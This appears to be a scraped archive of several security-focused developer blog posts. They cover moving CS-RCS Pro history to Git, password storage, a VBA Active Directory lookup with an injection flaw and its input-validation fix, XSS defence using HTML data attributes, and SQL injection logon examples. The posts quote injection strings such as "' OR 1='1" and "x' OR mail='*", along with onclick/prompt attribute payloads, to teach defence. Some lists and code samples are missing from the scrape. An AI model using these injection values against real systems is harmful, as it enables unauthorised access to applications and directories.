In which I move my version control from ComponentSoftware’s CS-RCS Pro to Git while preserving commit history.
OK, so having watched the video I linked to earlier, I thought I’d move some of my old projects to Git.
I picked one at random, and went looking for tools.
I’m hampered a little by the fact that all my old projects used ComponentSoftware’s “CS-RCS Pro”.
A couple of really good reasons:
But you know who doesn’t use CS-RCS Pro any more?
That’s right, ComponentSoftware.
It’s a dead platform, unsupported, unpatched, and belongs off my systems.
One simple reason – if I move off the platform, I face the usual choice when migrating from one version control system to another:
The second option seems a bit of a waste to me.
OK, so yes, technically I could mix the two modes, by using CS-RCS Pro to browse the ancient history when I need to, and Git to browse recent history, after starting Git from a clean working folder. But I could see a couple of problems:
So, really, I wanted to make sure that I could move my files, history and all.
I really didn’t have a good way to do it.
Clearly, any version control system can be moved to any other version control system by the simple expedient of:
But, as you can imagine, that’s really long-winded and manual. That should be automatable.
In fact, given the shared APIs of VSS-compatible source control services, I’m truly surprised that nobody has yet written a tool to do basically this task. I’d get on it myself, but I have other things to do. Maybe someone will write a “VSS2Git” or “VSS2VSS” toolkit to do just this.
There is a format for creating a single-file copy of a Git repository, which Git can process using the command “git fast-import”. So all I have to find is a tool that goes from a CS-RCS repository to the fast-import file format.
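As a rough illustration of that fast-import format, the sketch below builds a stream containing one commit per revision of a single file. The `fast_import_stream` helper and the field names in each revision dictionary are hypothetical, and pulling the revisions out of an RCS archive is not shown; only the `commit`, `committer`, `data` and `M ... inline` commands are taken from the git fast-import documentation.

```python
def fast_import_stream(revisions, path, branch="refs/heads/master"):
    # Build a git fast-import stream: one commit per revision of one file.
    # Each revision is a dict with hypothetical keys: author, email,
    # timestamp (seconds since the epoch, UTC), message (str), content (bytes).
    out = bytearray()
    for rev in revisions:
        message = rev["message"].encode("utf-8")
        content = rev["content"]
        # Later commits on the same branch take the previous commit as
        # their parent, so no explicit "from" line is needed here.
        out += f"commit {branch}\n".encode("utf-8")
        out += (
            f'committer {rev["author"]} <{rev["email"]}> '
            f'{rev["timestamp"]} +0000\n'
        ).encode("utf-8")
        # "data <n>" announces exactly n bytes of payload.
        out += b"data %d\n" % len(message) + message + b"\n"
        # "M <mode> inline <path>" supplies the file content in the commit.
        out += f"M 100644 inline {path}\n".encode("utf-8")
        out += b"data %d\n" % len(content) + content + b"\n"
    return bytes(out)
```

Written to a file, a stream like this could be fed to `git fast-import` on standard input from inside a freshly initialised repository.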
So, clearly there’s no tool to go from CS-RCS Pro to Git. There’s a tool to go from CS-RCS Pro to CVS, or there was, but that was on the now-defunct CS-RCS web site.
But… Remember I said that it’s compatible with GNU RCS?
And there are scripts to go from GNU RCS to Git.
OK, so the script for this is written in Ruby, and as I read it, there seemed to be a few things that made it look like it might be for Linux only.
I really wasn’t interested in making a Linux VM (easy though that may be) just so I could convert my data.
Everything changed with the arrival of the recent Windows 10 Anniversary Update, because along with it came a new component.
Bash on Ubuntu on Windows.
It’s like a Linux VM, without needing a VM, without having to install Linux, and it works really well.
With this, I could get all the tools I needed – GNU RCS, in case I needed it; Ruby; Git command line – and then I could try this out for myself.
Of course, I wouldn’t be publishing this if it wasn’t somewhat successful. But there are some caveats, OK?
I’ve tried this a few times, on ONE of my own projects. This isn’t robustly tested, so if something goes all wrong, please by all means share, and people who are interested (maybe me) will probably offer suggestions, some of them useful. I’m not remotely warrantying this or suggesting it’s perfect. It may wipe your development history out of your one and only copy of version control… so don’t do it on your one and only copy. Make a backup first.
GNU RCS likes to store files in one of two places – either in the same directory as the working files, but with a “,v” pseudo-extension added to the filename, or in a sub-directory off each working folder, called “RCS” and with the same “,v” extension on the files. If you did either of these things, there are no surprises. But…
CS-RCS Pro doesn’t do this. It has a separate RCS Repository Root. I put mine in C:\RCS, but you may have yours somewhere else. Underneath that RCS Repository Root is a full tree of the drives you’ve used CS-RCS to store (without the “:”), and a tree under that. I really hope you didn’t embed anything too deep, because that might bode ill.
Initially, this seemed like a bad thing, but because you don’t actually need the working files for this task, you can pretend that the RCS Repository is actually your working space.
Maybe this is obvious, but it took me a moment of thinking to decide I didn’t have to move files into RCS sub-folders of my working directories.
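To make that layout concrete, here is a small sketch that maps an archive under the RCS Repository Root back to the working file it describes. The `working_path_for` helper is hypothetical, and it assumes the archives under the root keep the “,v” suffix and that the first folder under the root is the drive letter without its colon.

```python
from pathlib import PureWindowsPath


def working_path_for(archive, repository_root=r"C:\RCS"):
    # Strip the repository root, leaving <drive letter>\<folders>\<file>,v
    relative = PureWindowsPath(archive).relative_to(PureWindowsPath(repository_root))
    drive, *rest = relative.parts
    if not rest or not rest[-1].endswith(",v"):
        raise ValueError(f"not an RCS archive path: {archive}")
    # Drop the ",v" pseudo-extension to recover the working file name.
    rest[-1] = rest[-1][:-2]
    # Put the colon back on the drive letter.
    return PureWindowsPath(drive + ":\\", *rest)
```

For example, with the default root, an archive at C:\RCS\C\Projects\foo\bar.c,v corresponds to the working file C:\Projects\foo\bar.c.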
Make this a “flag day”. After you do this conversion, never use CS-RCS Pro again. It was good, and it did the job, and it’s now buried in the garden next to Old Yeller. Do not sprinkle the zombification water on that hallowed ground to revive it.
This also means you MUST check in all your code before converting, because checking it in afterwards will be … difficult.
Assumption: You have Windows 10.
This might look like a lot of instructions, but I mostly just wanted to be clear. This is really quick work. If you screw up after the “git init” command, simply “rm -rf .git” to remove the new repository.
I hate when people ask me this question, because I inevitably respond with a half-dozen questions of my own, which makes me seem like a bit of an arse.
To reduce that feeling, because the questions don’t seem to be going away any time soon, I thought I’d write some thoughts out.
Passwords are important objects – and because people naturally share IDs and passwords across multiple services, your holding on to a customer’s / user’s password means you are a necessary part of that user’s web of credential storage.
It will be a monumental news story when your password database gets disclosed or leaked, and even more of a story if you’ve chosen a bad way of protecting that data. You will lose customers and you will lose business; you may even lose your whole business.
Take a long hard look at what you’re doing, and whether you actually need to be in charge of that kind of risk.
If you are going to verify a user, you don’t need encrypted passwords, you need hashed passwords. And those hashes must be salted. And the salt must be large and random. I’ll explain why some other time, but you should be able to find plenty of documentation on this topic on the Internet. Specifically, you don’t need to be able to decrypt the password from storage, you need to be able to recognise it when you are given it again. Better still, use an acknowledged good password hashing mechanism like PBKDF2. (Note the “2”: these mechanisms get superseded, so check for a newer recommendation if my advice is more than a few months old.)
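A minimal sketch of salted hashing with PBKDF2, using only Python’s standard library. The function names, the 16-byte salt and the iteration count are assumptions for illustration, not recommendations from this post; check current guidance before choosing real parameters.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumption: tune this to current guidance and your hardware


def hash_password(password, iterations=ITERATIONS):
    # A fresh, large, random salt for every password.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    # Store all three values; none of them lets you decrypt the password.
    return salt, iterations, digest


def verify_password(password, salt, iterations, expected_digest):
    # Recompute with the stored salt and iteration count, then compare
    # in constant time.
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(candidate, expected_digest)
```

Storing the iteration count next to the salt and digest leaves room to raise it later without invalidating existing records.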
Now, do not read the rest of this section – skip to the next question.
Seriously, what are you doing reading this bit? Go to the heading with the next question. You don’t need to read the next bit.
OK, if you are determined that you will have to impersonate a user (or a service account), you might actually need to store the password in a decryptable form.
First make sure you absolutely need to do this, because there are many other ways to impersonate an incoming user using delegation, etc, which don’t require you storing the password.
Explore delegation first.
Finally, if you really have to store the password in an encrypted form, you have to do it incredibly securely. Make sure the key is stored separately from the encrypted passwords, and don’t let your encryption be brute-forcible. A BAD way to encrypt would be to simply encrypt the password using your public key – sure, this means only you can decrypt it, but it means anyone can brute-force an encryption and compare it against the ciphertext.
A GOOD way to encrypt the password is to add some entropy and padding to it (so I can’t tell how long the password was, and I can’t tell if two users have the same password), and then encrypt it.
Password storage mechanisms such as keychains or password vaults will do this for you.
If you don’t have keychains or password vaults, you can encrypt using a function like Windows’ CryptProtectData, or its .NET equivalent, System.Security.Cryptography.ProtectedData.
[Caveat: CryptProtectData and ProtectedData use DPAPI, which requires careful management if you want it to work across multiple hosts. Read the API and test before deploying.]
[Keychains and password vaults often have the same sort of issue with moving the encrypted password from one machine to another.]
For .NET documentation on password vaults in Windows 8 and beyond, see: Windows.Security.Credentials.PasswordVault
For non-.NET on Windows from XP and later, see: CredWrite
For Apple, see documentation on Keychains
If you’re protecting data in a business, you can probably tell users how strong their passwords must be. Look for measures that correlate strongly with entropy – how long is the password, does it use characters from a wide range (or is it just the letter ‘a’ repeated over and over?), is it similar to any of the most common passwords, does it contain information that is obvious, such as the user’s ID, or the name of this site?
Maybe you can reward customers for longer passwords – even something as simple as a “strong account award” sticker on their profile page can induce good behaviour.
Length is mathematically more important to password entropy than the range of characters. An eight character password chosen from 64 characters (less than three hundred trillion combinations – a number with 4 commas) is weaker than a 64 character password chosen from eight characters (a number of combinations with 19 commas in it).
An 8-character password taken from 64 possible characters is actually as strong as a password only twice as long and chosen from 8 characters – this means something like a complex password at 8 characters in length is as strong as the names of the notes in a couple of bars of your favourite tune.
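The arithmetic above is easy to check. This short sketch (the `combinations` helper is just a name chosen here) counts the possible passwords for each case:

```python
def combinations(alphabet_size, length):
    # Number of distinct passwords of exactly this length.
    return alphabet_size ** length


short_complex = combinations(64, 8)   # 8 characters chosen from 64
long_simple = combinations(8, 64)     # 64 characters chosen from 8
twice_as_long = combinations(8, 16)   # 16 characters chosen from 8

print(f"{short_complex:,}")              # 281,474,976,710,656
print(f"{long_simple:,}".count(","))     # 19
print(short_complex == twice_as_long)    # True
```

Both 64^8 and 8^16 are 2^48, which is why doubling the length makes up for the much smaller character set.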
Allowing users to use password safes of their own makes it easier for them to use longer and more complex passwords. This means allowing copy and paste into password fields, and where possible, integrating with any OS-standard password management schemes.
Everything seems to default to sending a password reset email. This means your users’ email address is equivalent to their credential. Is that strength of association truly warranted?
In the process to change my email address, you should ask me for my password first, or similarly strongly identify me.
What happens when I stop paying my ISP, and they give my email address to a new user? Will they have my account on your site now, too?
Every so often, maybe you should renew the relationship between account and email address – baselining – to ensure that the address still exists and still belongs to the right user.
Password hints push you dangerously into the realm of actually storing passwords. People use hints such as “The password is ‘Oompaloompah’”, so if you store password hints, you must encrypt them as strongly as if you were encrypting the password itself. Because, much of the time, you are. And see the previous rule, which says you want to avoid doing that if at all possible.
How do you enforce occasional password changes, and why?
What happens when a user changes their password?
What happens when your password database is leaked?
What happens when you need to change hash algorithm?
Every so often, I write about some real-world problems in this blog, rather than just getting excited about generalities. This is one of those times.
I had a list of users the other day, exported from a partner with whom we do SSO, which somehow contained some duplicate entries.
These were not duplicate in the sense of “exactly the same data in every field”, but differed by email address, and sometimes last name. Those of you who manage identity databases will know exactly what I’m dealing with here – people change their last name, through marriage, divorce, adoption, gender reassignment, whim or other reason, and instead of editing the existing entry, a new entry is somehow populated to the list of identities.
What hadn’t changed was that each of these individuals still held their old email address in Active Directory, so all I had to do was look up each email address, relate it to a particular user, and then pull out the canonical email address for that user. [In this case, that’s the first email address returned from AD]
A quick search on the interwebs gave me this as a suggested VBA function to do just that:
Function GetEmail(email as String) as String
    ' Given one of this user's email addresses, find the canonical one.

    ' Find our default domain base to search from
    Set objRootDSE = GetObject("LDAP://RootDSE")
    strBase = "'LDAP://" & objRootDSE.Get("defaultNamingContext") & "'"

    ' Open a connection to AD
    Set ADOConnection = CreateObject("ADODB.Connection")
    ADOConnection.Provider = "ADsDSOObject"
    ADOConnection.Open "Active Directory Provider"

    ' Create a command
    Set ADCommand = CreateObject("ADODB.Command")
    ADCommand.ActiveConnection = ADOConnection

    ' Find user based on their email address
    ADCommand.CommandText = _
        "SELECT distinguishedName,userPrincipalName,mail FROM " & _
        strBase & " WHERE objectCategory='user' and mail='" & email & "'"

    ' Execute this command
    Set ADRecordSet = ADCommand.Execute

    ' Extract the canonical email address for this user.
    GetEmail = ADRecordSet.Fields("Mail")

    ' Return.
End Function
That did the trick, and I stopped thinking about it. Printed out the source just to demonstrate to a couple of people that this is not rocket surgery.
Yesterday the printout caught my eye. Here’s the particular line that made me stop:
ADCommand.CommandText = _
    "SELECT distinguishedName,userPrincipalName,mail FROM " & _
    strBase & " WHERE objectCategory='user' AND mail='" & email & "'"
That looks like a SQL query, doesn’t it?
Probably because it is.
It’s one of two formats that can be used to query Active Directory, the other being the less-readable LDAP syntax.
Both formats have the same problem – when you build the query using string concatenation like this, it’s possible for the input to give you an injection by escaping from the data and into the code.
I checked this out – when I called this function as follows, I got the first email address in the list as a response:
Debug.Print GetEmail("x' OR mail='*")
You can see my previous SQL injection articles to come up with ideas of other things I can do now that I’ve got the ability to inject.
Normally, I’d suggest developers use Parameterised Queries to solve this problem – and that’s always the best idea, because it not only improves security, but it actually makes the query faster on subsequent runs, because it’s already optimised. Here’s how that ought to look:
ADCommand.CommandText = _
    "SELECT distinguishedName,userPrincipalName,mail FROM " & _
    strBase & " WHERE objectCategory='user' AND mail=?"

' Create and bind parameter
Set ADParam = ADCommand.CreateParameter("", adVarChar, adParamInput, 40, email)
ADCommand.Parameters.Append ADParam
That way, the question mark “?” gets replaced with “’email@example.com’” (including the single quote marks) and my injection attempt gets quoted in magical ways (usually, doubling single-quotes, but the parameter insertion is capable of knowing in what way it’s being inserted, and how exactly to quote the data).
Except that running this gives me the rather meaningful message:
Run-time error ‘-2147467262 (80004002)’:
No such interface supported
It doesn’t actually tell me which interface isn’t supported, so of course I spend a half hour trying to figure out what changed that might have gone wrong – whether I’m using a question mark where perhaps I might need a named variable, possibly preceded by an “@” sign, but no, that’s SQL stored procedures, which are almost never the SQL injection solution they claim to be, largely because the same idiot who uses concatenation in his web service also does the same stupid trick in his SQL stored procedures, but I’m rambling now and getting far away from the point if I ever had one, so…
The interface that isn’t supported is the ability to set parameters.
The single best solution to SQL injection just plain isn’t provided in the ADODB library and/or the ADsDSOObject provider.
Why on earth would you miss that out, Microsoft?
So, the smart answer here is input validation where possible, and if you absolutely have to accept any and all input, you must quote the strings that you’re passing in.
In my case, because I’m dealing with email addresses, I think I can reasonably restrict my input to alphanumerics, the “@” sign, full stops, hyphens and underscores.
Input validation depends greatly on the type of your input. If it’s a string, that will need to be provided in your SQL request surrounded with single quotes – that means that any single quote in the string will need to be encoded safely. Usually that means doubling the quote mark, although you might choose to replace them with double quotes or back ticks.
If your input is a number, you can be more restrictive in your input validation – only those characters that are actually parts of a number. That’s not necessarily as easy as it sounds – the letter “e” is often part of numbers, for instance, and you have to decide whether you’re going to accept bases other than 10. But from the perspective of securing against SQL injection, again that’s not too difficult to enforce.
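Here is a rough sketch of those checks in Python rather than VBA. The function names are invented for illustration, the allow-list is the one described above for email addresses, and doubling single quotes is the usual SQL convention, which I have not verified against the AD provider’s SQL dialect.

```python
import re

# Alphanumerics, "@", full stops, hyphens and underscores only.
_EMAIL_CHARS = re.compile(r"[A-Za-z0-9_@.\-]+")
# Base-10 integers only: optional sign, then ASCII digits. No "e", no hex.
_DECIMAL_INT = re.compile(r"[+-]?[0-9]+")


def is_safe_email(value):
    # Allow-list check: every character must be one we recognise.
    return _EMAIL_CHARS.fullmatch(value) is not None


def quote_sql_string(value):
    # Fallback when arbitrary text must be accepted: double any single
    # quote, then wrap the whole value in single quotes.
    return "'" + value.replace("'", "''") + "'"


def parse_decimal_int(text):
    # Reject anything that is not a plain base-10 integer before converting.
    if _DECIMAL_INT.fullmatch(text) is None:
        raise ValueError("not a base-10 integer")
    return int(text)
```

With these, the injection attempt `x' OR mail='*` fails the allow-list check, and `1e5` is rejected as a number instead of being quietly interpreted.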
Finally, of course, you have to decide what to do when bad input comes in – an error response, a static value, throw an exception, ignore the input and refuse to respond, etc. If you choose to signal an error back to the user, be careful not to provide information an attacker could find useful.
Sometimes the mere presence of an error is useful.
Certainly if you feed back to the attacker the full detail of the SQL query that went wrong – and people do sometimes do this! – you give the attacker far too much information.
Even feeding back the incorrect input can be a bad thing in many cases. In the Excel case I’m running into, that’s probably not easily exploitable, but you probably should be cautious anyway – if it’s an attacker causing an error, they may want you to echo back their input to exploit something else.
Seriously, Microsoft, this is an unforgivable lapse – not only is there no ability to provide the single best protection, because you didn’t implement the parameter interface, but also your own samples provide examples of code that is vulnerable to SQL injections. [Here and here – the other examples I was able to find use hard-coded search filters.]
Microsoft, update your samples to demonstrate how to securely query AD through the ADODB library, and consider whether it’s possible to extend the provider with the parameter interface so that we can use the gold-standard protection.
Parse your parameters – make sure they conform to expected values. Complain to the user when they don’t. Don’t use lack of samples as a reason not to deliver secure components.
And, because I know a few of you will hope to copy directly from my code, here’s how I wound up doing this exact function.
Please, by all means review it for mistakes – I don’t guarantee that this is correct, just that it’s better than I found originally. For instance, one thing it doesn’t check for is if the user actually has a value set for the “mail” field in Active Directory – I can tell you for certain, it’ll give a null reference error if you have one of these users come back from your search.
Function GetEmail(email As String) As String
    ' Given one of this user's email addresses, find the canonical one.

    ' Pre-execution input validation - email must contain only recognised
    ' characters: alphanumerics, "_", "@", "." and "-". The hyphen goes last
    ' in the list so that Like treats it as a literal character.
    If email Like "*[!a-zA-Z0-9_@.-]*" Then
        GetEmail = "Illegal characters"
        Exit Function
    End If

    ' Find our default domain base to search from
    Set objRootDSE = GetObject("LDAP://RootDSE")
    strBase = "'LDAP://" & objRootDSE.Get("defaultNamingContext") & "'"

    ' Open a connection to AD
    Set ADOConnection = CreateObject("ADODB.Connection")
    ADOConnection.Provider = "ADsDSOObject"
    ADOConnection.Open "Active Directory Provider"

    ' Create a command
    Set ADCommand = CreateObject("ADODB.Command")
    ADCommand.ActiveConnection = ADOConnection

    ' Find user based on their email address
    ADCommand.CommandText = _
        "SELECT distinguishedName,userPrincipalName,mail FROM " & _
        strBase & " WHERE objectCategory='user' AND mail='" & email & "'"

    ' Execute this command
    Set ADrecordset = ADCommand.Execute

    ' Post execution validation - we should have exactly one answer.
    ' VBA's Or does not short-circuit, so test for Nothing on its own first.
    If ADrecordset Is Nothing Then
        GetEmail = "Not found"
        Exit Function
    End If
    If ADrecordset.EOF And ADrecordset.BOF Then
        GetEmail = "Not found"
        Exit Function
    End If
    If ADrecordset.RecordCount > 1 Then
        GetEmail = "Many matches"
        Exit Function
    End If

    ' Extract the canonical email address for this user.
    GetEmail = ADrecordset.Fields("Mail")

    ' Return.
End Function
As always, let me know if you find this at all useful.
Version control is one of those vital tools for developers that everyone has to use but very few people actually enjoy or understand.
So, it’s with no surprise that I noted a few months ago that the version control software on which I’ve relied for several years for my personal projects, ComponentSoftware’s CS-RCS, has not been updated in years, and can no longer be downloaded from its source site. [Hence no link from this blog]
I’ve used git before a few times in professional projects while I was working at Amazon, but relatively reluctantly – it has incredibly baroque and meaningless command-line options, and gives the impression that it was written by people who expected their users to be just as proficient with the ins and outs of version control as they are.
While I think it’s a great idea for developers to build software they would use themselves, I think it’s important to make sure that the software you build is also accessible to people who don’t have the same level of expertise as you. After all, if your users were as capable as the developer, they would already have built the solution for themselves, so your greater user-base comes from accommodating novices to experts with simple points of entry and levels of improved mastery.
git, along with many other open source, community-supported tools, doesn’t really accommodate the novice.
As such, it means that most people who use it rely on “cookbooks” of sets of instructions. “If you want to do X, type commands Y and Z” – without an emphasis on understanding why you’re doing this.
This leads inexorably to a feeling that you’re setting yourself up for a later fall, when you decide you want to do an advanced task, but discover that a decision you’ve made early on has prevented you from doing the advanced task in the way you want.
That’s why I’ve been reluctant to switch to git.
But it’s clear that git is the way forward in the tools I’m most familiar with – Visual Studio and its surrounding set of developer applications.
It’s one of those decisions I’ve made some time ago, but not enacted until now, because I had no idea how to start – properly. Every git repository I’ve worked with so far has either been set up by someone else, or set up by me, based on a cookbook, for a new project, and in a git environment that’s managed by someone else. I don’t even know if those terms, repository and environment, are the right terms for the things I mean.
There are a number of advanced things I want to do from the very first – particularly, I want to bring my code from the old version control system, along with its history where possible, into the new system.
And I have a feeling that this requires I understand the decisions I make when setting this up.
So, it was with much excitement that I saw a link to this arrive in my email:
Next thing is I’m going to watch this, and see how I’m supposed to work with git. I’ll let you know how it goes.
I happened upon a blog post by the Office team yesterday which surprised me, because it talked about a feature in PowerPoint that I’ve wanted ever since I first got my Surface 2.
Here’s a link to documentation on how to use this feature in PowerPoint.
It seems like the obvious feature a tablet should have.
Here’s a video of me using it to draw a few random shapes:
But not just in PowerPoint – this should be in Word, in OneNote, in Paint, and pretty much any app that accepts ink.
So here’s the blog post from Office noting that this feature will finally be available for OneNote in November.
On iPad, iPhone and Windows 10. Which I presume means it’ll only be on the Windows Store / Metro / Modern / Immersive version of OneNote.
That’s disappointing, because it should really be in every Office app. Hell, I’d update from Office 2013 tomorrow if this was a feature in Office 2016!
Please, Microsoft, don’t stop at the Windows Store version of OneNote.
Shape recognition, along with handwriting recognition (which is apparently also hard), should be a natural part of my use of the Surface Pen. It should work the same across multiple apps.
That’s only going to happen if it’s present in multiple apps, and is a documented API which developers – of desktop apps as well as Store apps – can call into.
Well, desktop apps can definitely get that.
I’ll admit that I haven’t had the time yet to build my own sample, but I’m hoping that this still works – there’s an API called “Ink Analysis”, which is exactly how you would achieve this in your app:
It allows you to analyse ink you’ve captured, and decide if it’s text or a drawing, and if it’s a drawing, what kind of drawing it might be.
[I’ve marked this with the tag “Alun’s Code” because I want to write a sample eventually that demonstrates this function.]
First, a disclaimer for the TL;DR crowd – data attributes alone will not stop all XSS, mine or anyone else’s. You have to apply them correctly, and use them properly.
However, I think you’ll agree with me that it’s a great way to store and reference data in a page, and that if you only handle user data in correctly encoded data attributes, you have a greatly-reduced exposure to XSS, and can actually reduce your exposure to zero.
Next, a reminder about my theory of XSS – that there are four parts to an XSS attack – Injection, Escape, Attack and Cleanup. Injection is necessary and therefore can’t be blocked, Attacks are too varied to block, and Cleanup isn’t always required for an attack to succeed. Clearly, then, the Escape is the part of the XSS attack quartet that you can block.
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
Let’s suppose that “SEARCH-STRING” above is the string for which I searched.
I can inject my code as a search for:
The second line then becomes:
window.open() function, and by then it’s too late, because it’s already executed the bad thing. A more sensible language would have thrown an error at compile time, but this is just another reason for security guys to hate dynamic languages.
A data attribute is an attribute in an HTML tag, whose name begins with the word “data” and a hyphen.
These data attributes can be on any HTML tag, but usually they sit in a tag which they describe, or which is at least very close to the portion of the page they describe.
Data attributes on table cells can be associated to the data within that cell, data attributes on a body tag can be associated to the whole page, or the context in which the page is loaded.
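Because data attributes are HTML attributes, quoting their contents is easy. In fact, there are really only three quoting rules to consider:
1. The attribute’s value must be surrounded with double quotes.
2. Any ampersand (“&”) characters need to be HTML encoded to “&amp;”.
3. Any double quote (“"”) characters need to be HTML encoded to “&quot;”.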
Rules 2 & 3 can simply be replaced with “HTML encode everything in the value other than alphanumerics” before applying rule 1, and if that’s easier, do that.
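As a sketch of the “HTML encode everything” shortcut, the Python below encodes a hostile value into a double-quoted data attribute, then parses the markup again to confirm the value comes back intact as data. The helper names are made up for this example, and `html.escape` encodes a little more than the rules strictly require (it also handles “<”, “>” and single quotes), which is harmless here.

```python
import html
from html.parser import HTMLParser


def data_attribute(name, value):
    # Encode the value first, then wrap it in double quotes.
    return f'data-{name}="{html.escape(value, quote=True)}"'


class _AttributeReader(HTMLParser):
    # Collects the attributes of every start tag it sees.
    def __init__(self):
        super().__init__()
        self.attributes = {}

    def handle_starttag(self, tag, attrs):
        # The parser hands over attribute values already HTML-decoded.
        self.attributes.update(attrs)


def read_attributes(markup):
    reader = _AttributeReader()
    reader.feed(markup)
    reader.close()
    return reader.attributes


hostile = '"><script>alert(1)</script>&'
markup = f"<div {data_attribute('search-term', hostile)}></div>"
```

Here `read_attributes(markup)` gives back the original hostile string under the name `data-search-term`, and the markup itself contains no literal `<script>` tag.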
HTML parses attribute value strings very simply – look for the first non-space character after the “=” sign, which is either a quote or not a quote. If it’s a quote, find another one of the same kind, HTML-decode what’s in between them, and that’s the attribute’s value. If the first non-space after the equal sign is not a quote, the value ends at the next space character.
Contemplate how these are parsed, and then see if you’re right:
<a onclick="prompt("1")"><a onclick="prompt("1")"></a>
<a onclick = "prompt( 1 )"><a onclick = "prompt( 1 )"></a>
<a onclick= prompt( 1 ) ><a onclick= prompt( 1 ) ></a>
<a onclick= prompt(" 1 ") ><a onclick= prompt(" 1 ") ></a>
<a onclick= prompt( "1" ) ><a onclick= prompt( "1" ) ></a>
<a onclick= "prompt( 1 )"><a onclick=&#9;"prompt( 1 )"></a>
<a onclick= "prompt( 1 )"><a onclick=&#32;"prompt( 1 )"></a>
<a onclick= thing=1;prompt(thing)><a onclick= thing=1;prompt(thing)></a>
<a onclick="prompt(\"1\")"><a onclick="prompt(\"1\")"></a>
Try each of them (they aren’t live in this document – you should paste them into an HTML file and open it in your browser), see which ones prompt when you click on them. Play with some other formats of quoting. Did any of these surprise you as to how the browser parsed them?
Here’s how they look in the Debugger in Internet Explorer 11:
Uh… That’s not right, particularly line 8. Clearly syntax colouring in IE11’s Debugger window needs some work.
OK, let’s try the DOM Explorer:
Much better – note how the DOM explorer reorders some of these attributes, because it’s reading them out of the Document Object Model (DOM) in the browser as it is rendered, rather than as it exists in the source file. Now you can see which are interpreted as attribute names (in red) and which are the attribute values (in blue).
Other browsers have similar capabilities, of course – use whichever one works for you.
Hopefully this demonstrates why you need to follow the rules of 1) quoting with double quotes, 2) encoding any ampersand, and 3) encoding any double quotes.
So, now if I use those data-attributes, my HTML includes a number of tags, each with one or more attributes named “data-*”. Inside an event handler, you can use the “this” object to refer to the object on which the event is handled (so you may want to attach the data-* attributes to the object which triggers the handler).
If you’re not inside of an event handler, or you want to get access to another tag, you should find the object representing the tag in some other way – usually
Once you have the object, you can query an attribute with the function getAttribute(…) – the single argument is the name of the attribute, and what’s returned is a string – and any HTML encoding in the data-attribute will have been decoded once.
Other frameworks have ways of accessing this data attribute more easily – for instance, jQuery has a “.data(…)” function which will fetch a data attribute’s value.
I’ve noted before that stopping XSS is a “simple” matter of finding where you allow injection, and preventing, in a logical manner, every possible escape from the context into which you inject that data, so that it cannot possibly become code.
If all the data you inject into a page is injected as HTML attribute values or HTML text, you only need to know one function – HTML Encode – and whether you need to surround your value with quotes (in a data-attribute) or not (in HTML text). That’s a lot easier than trying to understand multiple injection contexts each with their own encoding function. It’s a lot easier to protect the inclusion of arbitrary user data in your web pages, and you’ll also gain the advantage of not having multiple injection points for the same piece of data. In short, your web page becomes more object-oriented, which isn’t a bad thing at all.
You can still kick your own arse.
When converting user input from the string you get from getAttribute to a numeric value, what function are you going to use?
Please don’t say “eval”.
Eval is evil. Just like document.write, its use is an invitation to Cross-Site Scripting.
Use a dedicated parsing function such as parseInt(), because such functions won’t evaluate function calls or other nefarious components in your strings.
So, now I’m hoping your Omniture script looks like this:
<div id="myDataDiv" data-search-term="SEARCH-STRING"></div>
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
You didn’t forget to HTML encode your SEARCH-STRING, or at least its quotes and ampersands, did you?
P.S. Omniture doesn’t cause XSS, but many people implementing its required calls do.
But then, I’m hacking your website because of a 15-year-old flaw.
It’s been noted for some time that I love playing with XSS, simply because it’s so widespread, and because it’s an indication of the likely security stance of the rest of the website.
But while XSS is important because it’s so widespread, it has a relatively low impact.
Slightly less widely spread, but often the cause of far greater damage, is SQL injection.
I’ll talk some more later about how SQL injection happens, but for now, here’s a quick demonstration of the power of SQL injection.
Every demonstration of SQL injection I’ve ever seen includes this example:
sqlCommandString = "SELECT userid FROM users WHERE userid='" + inputID + "' AND password='" + inputPass + "'"
And of course, the trick here is to supply the user ID “admin” and the password “' OR 1='1”.
Sure, IF you have that code in your app, that will let the user in as admin.
But then, IF you have that code in your app, you have many bigger problems than SQL injection – because your user database contains unprotected passwords, and a leak will automatically tell the world how poor your security is, and always has been.
More likely, if you have SQL injection in the logon code at all, is that you will have code like this:
sqlCommandString = "SELECT userid, password FROM users WHERE userid='" + inputID + "'"
… execute sqlCommandString …
… extract salt …
… hash incoming password …
… compare salted hash of incoming password against stored password …
Again, if you were to have designed poorly, you might allow for multiple user records to come back (suppose, say, you allow the user to reuse old passwords, or old hashing algorithms), and you accept the first account with the right password. In that case, yes, an attacker could hack the login page with a common password, and the user ID “' OR userid LIKE '%” – but then the attacker would have to know the field was called userid, and they’re only going to get the first account in your database that has that password.
Doubtless there are many login pages which are vulnerable to SQL injection attacks like this, but they are relatively uncommon where developers have some experience or skill.
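For contrast, here is a rough sketch of the same logon flow with the user ID passed as a query parameter rather than concatenated into the command string. It is an illustration only: it uses Python's built-in sqlite3 as a stand-in for whatever database the site really runs, and the table layout, the PBKDF2 settings and the function names are all assumptions of mine, not anything taken from a real application.

```python
import hashlib
import hmac
import os
import sqlite3


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted hash of a password (PBKDF2-HMAC-SHA256; iteration count is illustrative)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def create_user(db: sqlite3.Connection, userid: str, password: str) -> None:
    salt = os.urandom(16)
    db.execute(
        "INSERT INTO users (userid, salt, password) VALUES (?, ?, ?)",
        (userid, salt, hash_password(password, salt)),
    )


def check_login(db: sqlite3.Connection, input_id: str, input_pass: str) -> bool:
    # The ? placeholder sends input_id as data; it is never parsed as SQL text.
    rows = db.execute(
        "SELECT salt, password FROM users WHERE userid = ?", (input_id,)
    ).fetchall()
    if len(rows) != 1:  # refuse anything but exactly one matching record
        return False
    salt, stored = rows[0]
    # Constant-time comparison of the salted hashes.
    return hmac.compare_digest(hash_password(input_pass, salt), stored)


db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (userid TEXT PRIMARY KEY, salt BLOB, password BLOB)")
create_user(db, "admin", "correct horse")

print(check_login(db, "admin", "correct horse"))                # True
print(check_login(db, "' OR userid LIKE '%", "correct horse"))  # False
```

With the placeholder in use, the injected user ID is just an odd-looking name that matches no record.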
Where do you use a SQL-like database?
